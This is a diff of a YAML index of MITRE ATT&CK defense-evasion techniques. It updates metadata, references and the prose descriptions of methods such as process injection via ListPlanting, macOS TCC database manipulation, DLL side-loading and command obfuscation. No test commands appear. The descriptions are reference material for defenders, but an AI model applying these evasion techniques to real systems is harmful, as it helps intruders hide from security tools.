         Directory PowerShell modules, such as <code>Set-ADUser</code> and <code>Set-ADAccountControl</code>,
         that change account configurations. \n\nMonitor Fine-Grained Password Policies
         and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Command: Command Execution'
       - 'User Account: User Account Metadata'
       - 'Script: Script Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+      created: '2022-01-13T20:02:28.349Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/005
+        external_id: T1556.005
+      - source_name: dump_pwd_dcsync
+        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+        url: https://adsecurity.org/?p=2053
+      - source_name: store_pwd_rev_enc
+        description: Microsoft. (2021, October 28). Store passwords using reversible
+          encryption. Retrieved January 3, 2022.
+        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+      - source_name: how_pwd_rev_enc_1
+        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+          encryption: how it works (part 1). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+      - source_name: how_pwd_rev_enc_2
+        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+          encryption: how it works (part 2). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1027.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T19:43:18.873Z'
       name: Command Obfuscation
       description: |-
         Adversaries may obfuscate content during command execution to impede detection. Command-line obfuscation is a method of making strings and patterns within commands and scripts more difficult to signature and analyze. This type of obfuscation can be included within commands executed by delivered payloads (e.g., [Phishing](https://attack.mitre.org/techniques/T1566) and [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)) or interactively via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: Akamai JS)(Citation: Malware Monday VBE)
@@ -12368,8 +12688,9 @@ defense-evasion:
         url: https://attack.mitre.org/techniques/T1027/010
         external_id: T1027.010
       - source_name: Twitter Richard WMIC
-        description: Ackroyd, R. (2023, March 24). Twitter. Retrieved March 24, 2023.
-        url: https://twitter.com/rfackroyd/status/1639136000755765254
+        description: Ackroyd, R. (2023, March 24). Twitter. Retrieved September 12,
+          2024.
+        url: https://x.com/rfackroyd/status/1639136000755765254
       - source_name: Invoke-Obfuscation
         description: Bohannon, D. (2016, September 24). Invoke-Obfuscation. Retrieved
           March 17, 2023.
@@ -12405,43 +12726,23 @@ defense-evasion:
         url: https://redcanary.com/threat-detection-report/techniques/powershell/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1070.004:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Walker Johnson
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c
-      created: '2020-01-31T12:35:36.479Z'
-      x_mitre_version: '1.1'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1070.004
-        url: https://attack.mitre.org/techniques/T1070/004
-      - source_name: Microsoft SDelete July 2016
-        url: https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
-        description: Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February
-          8, 2018.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-10-15T16:33:59.107Z'
+      name: 'Indicator Removal on Host: File Deletion'
       description: |-
         Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
 
         There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well.(Citation: Microsoft SDelete July 2016) Examples of built-in [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) functions include <code>del</code> on Windows and <code>rm</code> or <code>unlink</code> on Linux and macOS.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Indicator Removal on Host: File Deletion'
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Walker Johnson
+      x_mitre_deprecated: false
       x_mitre_detection: It may be uncommon for events related to benign command-line
         functions such as DEL or third-party utilities or tools to be found in an
         environment, depending on the user base and how systems are typically used.
@@ -12452,18 +12753,36 @@ defense-evasion:
         network that an adversary could introduce. Some monitoring tools may collect
         command-line arguments, but may not capture DEL commands since DEL is a native
         function within cmd.exe.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: defense-evasion
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Deletion'
       x_mitre_defense_bypassed:
       - Host forensic analysis
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c
+      created: '2020-01-31T12:35:36.479Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1070/004
+        external_id: T1070.004
+      - source_name: Microsoft SDelete July 2016
+        description: Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February
+          8, 2018.
+        url: https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.004
     atomic_tests: []
   T1221:
@@ -12525,7 +12844,7 @@ defense-evasion:
         description: Hanson, R. (2016, September 24). phishery. Retrieved July 21,
           2018.
         source_name: ryhanson phishery SEPT 2016
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-01-12T18:16:56.176Z'
       name: Template Injection
       description: |-
         Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.(Citation: Microsoft Open XML July 2017)
@@ -12555,13 +12874,11 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1221
     atomic_tests: []
   T1134:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.762Z'
       name: Access Token Manipulation
       description: |-
         Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
@@ -12658,7 +12975,6 @@ defense-evasion:
         url: https://pentestlab.blog/2017/04/03/token-manipulation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1027.002:
     technique:
@@ -12721,7 +13037,6 @@ defense-evasion:
         url: https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1027.002
     atomic_tests: []
   T1564.005:
@@ -12759,7 +13074,7 @@ defense-evasion:
         description: 'Kaspersky Lab''s Global Research and Analysis Team. (2015, February).
           Equation Group: Questions and Answers. Retrieved December 21, 2015.'
         url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-06-29T15:12:11.024Z'
       name: Hidden File System
       description: |-
         Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.(Citation: MalwareTech VFS Nov 2014)
@@ -12786,8 +13101,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1055.005:
     technique:
@@ -12815,7 +13128,7 @@ defense-evasion:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:24:54.198Z'
       name: Thread Local Storage
       description: "Adversaries may inject malicious code into processes via thread
         local storage (TLS) callbacks in order to evade process-based defenses as
@@ -12859,8 +13172,6 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1622:
     technique:
@@ -12915,7 +13226,7 @@ defense-evasion:
         Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>IsDebuggerPresent()</code> and <code> NtQueryInformationProcess()</code>, or manually checking the <code>BeingDebugged</code> flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
 
         Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>OutputDebugStringW()</code>.(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-16T15:05:55.918Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Debugger Evasion
       x_mitre_detection: |-
@@ -12935,7 +13246,6 @@ defense-evasion:
       - 'Command: Command Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1622
     atomic_tests: []
   T1036.006:
@@ -12985,7 +13295,6 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1036.006
     atomic_tests: []
   T1550.002:
@@ -13040,12 +13349,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1550.002
     atomic_tests: []
   T1574.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.241Z'
       name: 'Hijack Execution Flow: DLL Side-Loading'
       description: |-
         Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -13095,12 +13403,11 @@ defense-evasion:
         url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.002
     atomic_tests: []
   T1216.002:
     technique:
-      modified: '2024-04-18T23:51:40.464Z'
+      modified: '2024-09-12T19:42:21.547Z'
       name: SyncAppvPublishingServer
       description: "Adversaries may abuse SyncAppvPublishingServer.vbs to proxy execution
         of malicious [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands.
@@ -13160,8 +13467,8 @@ defense-evasion:
       - source_name: 7 - appv
         description: Nick Landers. (2017, August 8). Need a signed alternative to
           Powershell.exe? SyncAppvPublishingServer in Win10 has got you covered..
-          Retrieved February 6, 2024.
-        url: https://twitter.com/monoxgas/status/895045566090010624
+          Retrieved September 12, 2024.
+        url: https://x.com/monoxgas/status/895045566090010624
       - source_name: 3 - appv
         description: 'Raj Chandel. (2022, March 17). Indirect Command Execution: Defense
           Evasion (T1202). Retrieved February 6, 2024.'
@@ -13178,37 +13485,18 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1548.006:
     technique:
-      modified: '2024-04-17T00:02:12.021Z'
+      modified: '2024-10-16T16:54:56.714Z'
       name: TCC Manipulation
-      description: "Adversaries can manipulate or abuse the Transparency, Consent,
-        & Control (TCC) service or database to execute malicious applications with
-        elevated permissions. TCC is a Privacy & Security macOS control mechanism
-        used to determine if the running process has permission to access the data
-        or services protected by TCC, such as screen sharing, camera, microphone,
-        or Full Disk Access (FDA).\n\nWhen an application requests to access data
-        or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database,
-        located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent),
-        for existing permissions. If permissions do not exist, then the user is prompted
-        to grant permission. Once permissions are granted, the database stores the
-        application's permissions and will not prompt the user again unless reset.
-        For example, when a web browser requests permissions to the user's webcam,
-        once granted the web browser may not explicitly prompt the user again.(Citation:
-        welivesecurity TCC)\n\nAdversaries may manipulate the TCC database or otherwise
-        abuse the TCC service to execute malicious content. This can be done in various
-        ways, including using privileged system applications to execute malicious
-        payloads or manipulating the database to grant their application TCC permissions.
-        \n\nFor example, adversaries can use Finder, which has FDA permissions by
-        default, to execute malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002)
-        while preventing a user prompt. For a system without System Integrity Protection
-        (SIP) enabled, adversaries have also manipulated the operating system to load
-        an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation:
-        TCC macOS bypass)(Citation: TCC Database)\n\nAdversaries may also opt to instead
-        inject code (e.g., [Process Injection](https://attack.mitre.org/techniques/T1055))
-        into targeted applications with the desired TCC permissions.\n"
+      description: |+
+        Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).
+
+        When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)
+
+        Adversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)
+
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -13216,6 +13504,8 @@ defense-evasion:
         phase_name: privilege-escalation
       x_mitre_contributors:
       - Marina Liang
+      - Wojciech Reguła @_r3ggi
+      - Csaba Fitzl @theevilbit of Kandji
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -13223,7 +13513,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - macOS
-      x_mitre_version: '1.0'
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Modification'
@@ -13253,7 +13543,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.008:
     technique:
@@ -13299,7 +13588,7 @@ defense-evasion:
         description: stderr. (2014, February 14). Detecting Userland Preload Rootkits.
           Retrieved December 20, 2017.
         source_name: Chokepoint preload rootkits
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:26:31.766Z'
       name: Ptrace System Calls
       description: "Adversaries may inject malicious code into processes via ptrace
         (process trace) system calls in order to evade process-based defenses as well
@@ -13344,8 +13633,6 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1027.007:
     technique:
@@ -13390,7 +13677,7 @@ defense-evasion:
         To avoid static or other defensive analysis, adversaries may use dynamic API resolution to conceal malware characteristics and functionalities. Similar to [Software Packing](https://attack.mitre.org/techniques/T1027/002), dynamic API resolution may change file signatures and obfuscate malicious API function calls until they are resolved and invoked during runtime.
 
         Various methods may be used to obfuscate malware calls to API functions. For example, hashes of function names are commonly stored in malware in lieu of literal strings. Malware can use these hashes (or other identifiers) to manually reproduce the linking and loading process using functions such as `GetProcAddress()` and `LoadLibrary()`. These hashes/identifiers can also be further obfuscated using encryption or other string manipulation tricks (requiring various forms of [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) during execution).(Citation: BlackHat API Packers)(Citation: Drakonia HInvoke)(Citation: Huntress API Hash)
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-08-23T18:32:46.899Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Obfuscated Files or Information: Dynamic API Resolution'
       x_mitre_detection: ''
@@ -13404,58 +13691,28 @@ defense-evasion:
       - 'Process: OS API Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1027.007
     atomic_tests: []
   T1055.015:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - ESET
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
-      type: attack-pattern
-      created: '2021-11-22T15:02:15.190Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1055.015
-        url: https://attack.mitre.org/techniques/T1055/015
-      - source_name: Microsoft List View Controls
-        url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
-        description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
-          January 4, 2022.
-      - source_name: Modexp Windows Process Injection
-        url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
-        description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
-          Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
-          Retrieved November 15, 2021.'
-      - source_name: ESET InvisiMole June 2020
-        url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
-        description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
-          HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-14T17:34:33.948Z'
       name: 'Process Injection: ListPlanting'
       description: "Adversaries may abuse list-view controls to inject malicious code
         into hijacked processes in order to evade process-based defenses as well as
         possibly elevate privileges. ListPlanting is a method of executing arbitrary
-        code in the address space of a separate live process. Code executed via ListPlanting
-        may also evade detection from security products since the execution is masked
-        under a legitimate process.\n\nList-view controls are user interface windows
-        used to display collections of items.(Citation: Microsoft List View Controls)
-        Information about an application's list-view settings are stored within the
-        process' memory in a <code>SysListView32</code> control.\n\nListPlanting (a
-        form of message-passing \"shatter attack\") may be performed by copying code
-        into the virtual address space of a process that uses a list-view control
-        then using that code as a custom callback for sorting the listed items.(Citation:
-        Modexp Windows Process Injection) Adversaries must first copy code into the
-        target process’ memory space, which can be performed various ways including
-        by directly obtaining a handle to the <code>SysListView32</code> child of
-        the victim process window (via Windows API calls such as <code>FindWindow</code>
+        code in the address space of a separate live process.(Citation: Hexacorn Listplanting)
+        Code executed via ListPlanting may also evade detection from security products
+        since the execution is masked under a legitimate process.\n\nList-view controls
+        are user interface windows used to display collections of items.(Citation:
+        Microsoft List View Controls) Information about an application's list-view
+        settings are stored within the process' memory in a <code>SysListView32</code>
+        control.\n\nListPlanting (a form of message-passing \"shatter attack\") may
+        be performed by copying code into the virtual address space of a process that
+        uses a list-view control then using that code as a custom callback for sorting
+        the listed items.(Citation: Modexp Windows Process Injection) Adversaries
+        must first copy code into the target process’ memory space, which can be performed
+        various ways including by directly obtaining a handle to the <code>SysListView32</code>
+        child of the victim process window (via Windows API calls such as <code>FindWindow</code>
         and/or <code>EnumWindows</code>) or other [Process Injection](https://attack.mitre.org/techniques/T1055)
         methods.\n\nSome variations of ListPlanting may allocate memory in the target
         process but then use window messages to copy the payload, to avoid the use
@@ -13472,6 +13729,9 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_contributors:
+      - ESET
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitoring Windows API calls indicative of the various types
         of code injection may generate a significant amount of data and may not be
         directly useful for defense unless collected under specific circumstances
@@ -13486,21 +13746,52 @@ defense-evasion:
         arguments.\n\nAnalyze process behavior to determine if a process is performing
         unusual actions, such as opening network connections, reading files, or other
         suspicious actions that could relate to post-compromise behavior. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Process: Process Modification'
       - 'Process: OS API Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
+      created: '2021-11-22T15:02:15.190Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1055/015
+        external_id: T1055.015
+      - source_name: Hexacorn Listplanting
+        description: Hexacorn. (2019, April 25). Listplanting – yet another code injection
+          trick. Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/
+      - source_name: ESET InvisiMole June 2020
+        description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
+          HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
+        url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
+      - source_name: Microsoft List View Controls
+        description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
+          January 4, 2022.
+        url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
+      - source_name: Modexp Windows Process Injection
+        description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
+          Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
+          Retrieved November 15, 2021.'
+        url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1055.015
     atomic_tests: []
   T1484:
     technique:
-      modified: '2024-04-19T04:27:31.884Z'
+      modified: '2024-10-15T15:55:32.946Z'
       name: Domain or Tenant Policy Modification
       description: "Adversaries may modify the configuration settings of a domain
         or identity tenant to evade defenses and/or escalate privileges in centrally
@@ -13545,9 +13836,8 @@ defense-evasion:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - SaaS
-      x_mitre_version: '3.0'
+      - Identity Provider
+      x_mitre_version: '3.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Deletion'
       - 'Active Directory: Active Directory Object Creation'
@@ -13604,8 +13894,8 @@ defense-evasion:
         url: https://wald0.com/?p=179
       - source_name: Harmj0y Abusing GPO Permissions
         description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
-          March 5, 2019.
-        url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+          September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
       - source_name: Sygnia Golden SAML
         description: Sygnia. (2020, December). Detection and Hunting of Golden SAML
           Attack. Retrieved January 6, 2021.
@@ -13614,57 +13904,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1220:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Avneet Singh
-      - Casey Smith
-      - Praetorian
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3
-      created: '2018-10-17T00:14:20.652Z'
-      x_mitre_version: '1.2'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1220
-        url: https://attack.mitre.org/techniques/T1220
-      - source_name: Reaqta MSXSL Spearphishing MAR 2018
-        url: https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
-        description: Admin. (2018, March 2). Spear-phishing campaign leveraging on
-          MSXSL. Retrieved July 3, 2018.
-      - source_name: Twitter SquiblyTwo Detection APR 2018
-        url: https://twitter.com/dez_/status/986614411711442944
-        description: Desimone, J. (2018, April 18). Status Update. Retrieved July
-          3, 2018.
-      - source_name: LOLBAS Wmic
-        url: https://lolbas-project.github.io/lolbas/Binaries/Wmic/
-        description: LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.
-      - source_name: Microsoft msxsl.exe
-        url: https://www.microsoft.com/download/details.aspx?id=21714
-        description: Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe).
-          Retrieved July 3, 2018.
-      - source_name: Penetration Testing Lab MSXSL July 2017
-        url: https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
-        description: netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved
-          July 3, 2018.
-      - source_name: XSL Bypass Mar 2019
-        url: https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75
-        description: Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to
